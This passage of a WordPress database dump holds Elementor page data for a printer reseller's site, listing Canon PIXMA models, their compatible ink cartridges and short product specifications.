align=\\\"center\\\">PIXMA TR8570<\\/td>\\n      <td>CLI-781 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA TS207<\\/td>\\n      <td>CL-746 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746S (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745S (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA TS307<\\/td>\\n      <td>CL-746 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746S (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745S (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA TS5070<\\/td>\\n      <td>CLI-771 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-770 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-770XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA TS5170<\\/td>\\n      <td>CL-741 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-741XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740\\/CL-741 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr align=\\\"center\\\">\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA TS8270<\\/td>\\n      <td>CLI-781 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Photo Blue)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Photo Blue)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA TS9170<\\/td>\\n      <td>CLI-781 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Photo Blue)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Photo Blue)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA TS9570<\\/td>\\n      <td>CLI-781 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3802,2718,'_elementor_edit_mode','builder'),(3803,2718,'_elementor_template_type','post'),(3780,2715,'_wp_page_template','template-fullwidth.php'),(3781,2715,'_elementor_edit_mode','builder'),(3782,2715,'_elementor_template_type','post'),(3783,2715,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Printer :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One with Fax for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan\\u00a0 Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"29fd978d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"38034358\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fbf6246\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Printer :-<\\/h3>\\r\\n<table>\\r\\n<tbody>\\r\\n<tr>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2345\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXMA E560 \\/ E560R<\\/strong>\\r\\n\\r\\nAdvanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing\\r\\n\\r\\nThe Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.\\r\\n\\r\\nAvailable in Black and Red.\\r\\n\\r\\nPrint, Scan, Copy\\r\\n\\r\\nISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour\\r\\n\\r\\nHi-speed USB 2.0, WiFi\\r\\n\\r\\nRecommended print volume: 80 - 400 pages\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2346\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXMA E4270<\\/strong>\\r\\n\\r\\n<span style=\\\"font-family: inherit; font-size: inherit;\\\">Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/span>\\r\\n\\r\\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\\r\\n\\r\\nPrint, Scan, Copy, Fax\\r\\n\\r\\nISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour\\r\\n\\r\\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\\r\\n\\r\\nRecommended print volume: 50 - 200 pages\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2347\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXMA TS9570<\\/strong>\\r\\n\\r\\nA3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder\\r\\n\\r\\nThis A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.\\r\\n\\r\\nPrint, Scan, Copy\\r\\n\\r\\nISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour\\r\\n\\r\\nHi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct\\r\\n\\r\\nRecommended print volume: 80 - 300 pages\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2348\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXMA TS8270<\\/strong>\\r\\n\\r\\nWireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing\\r\\n\\r\\nThis advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.\\r\\n\\r\\nAvailable in Black, Red and White.\\r\\n\\r\\nPrint, Scan, Copy\\r\\n\\r\\nISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour\\r\\n\\r\\nHi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct\\r\\n\\r\\nRecommended print volume: 30 - 100 pages\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<\\/tr>\\r\\n<tr>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2349\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXM<span style=\\\"font-family: inherit; font-size: inherit;\\\">A<\\/span><span style=\\\"font-family: inherit; font-size: inherit;\\\">\\u00a0G2010<\\/span><\\/strong>\\r\\n\\r\\nRefillable Ink Tank All-In-One for High Volume Printing\\r\\n\\r\\nDesigned for high volume printing at low running cost\\r\\n\\r\\nPrint, Scan &amp; Copy\\r\\n\\r\\nISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour\\r\\n\\r\\nHi-speed USB 2.0\\r\\n\\r\\nRecommended print volume: 150 - 1500 pages\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2351\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXMA G4010<\\/strong>\\r\\n\\r\\nRefillable Ink Tank Wireless All-In-One with Fax for High Volume Printing\\r\\n\\r\\nDesigned for high volume printing at low running cost.\\r\\n\\r\\nPrint, Scan, Copy and Fax\\r\\n\\r\\nISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour\\r\\n\\r\\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode\\r\\n\\r\\nRecommended print volume: 150 - 1500 pages\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2352\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXMA G1010<\\/strong>\\r\\n\\r\\nRefillable Ink Tank Printer for High Volume Printing\\r\\n\\r\\nDesigned for high volume printing at low running cost\\r\\n\\r\\nPrint\\r\\n\\r\\nISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)\\r\\n\\r\\nPhoto Speed (4 x 6\\\"): 60sec. (borderless)\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2353\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-1.png\\\" alt=\\\"\\\" width=\\\"362\\\" height=\\\"320\\\" \\/>\\r\\n\\r\\n<strong>PIXMA G3010<\\/strong>\\r\\n\\r\\nRefillable Ink Tank Wireless All-In-One for High Volume Printing\\r\\n\\r\\nDesigned for high volume printing at low running cost\\r\\n\\r\\nPrint, Scan\\u00a0 Copy\\r\\n\\r\\nISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour\\r\\n\\r\\nHi-speed USB 2.0, WiFi, Mopria, Access Point Mode\\r\\n\\r\\nRecommended print volume: 150 - 1500 pages\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]<\\/td>\\r\\n<\\/tr>\\r\\n<\\/tbody>\\r\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3785,1449,'_elementor_version','2.5.14'),(3801,2718,'_wp_page_template','template-fullwidth.php'),(3787,2716,'_wp_page_template','template-fullwidth.php'),(3788,2716,'_elementor_edit_mode','builder'),(3789,2716,'_elementor_template_type','post'),(3790,2716,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Printer :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>[maxbutton id=\\\"1\\\" 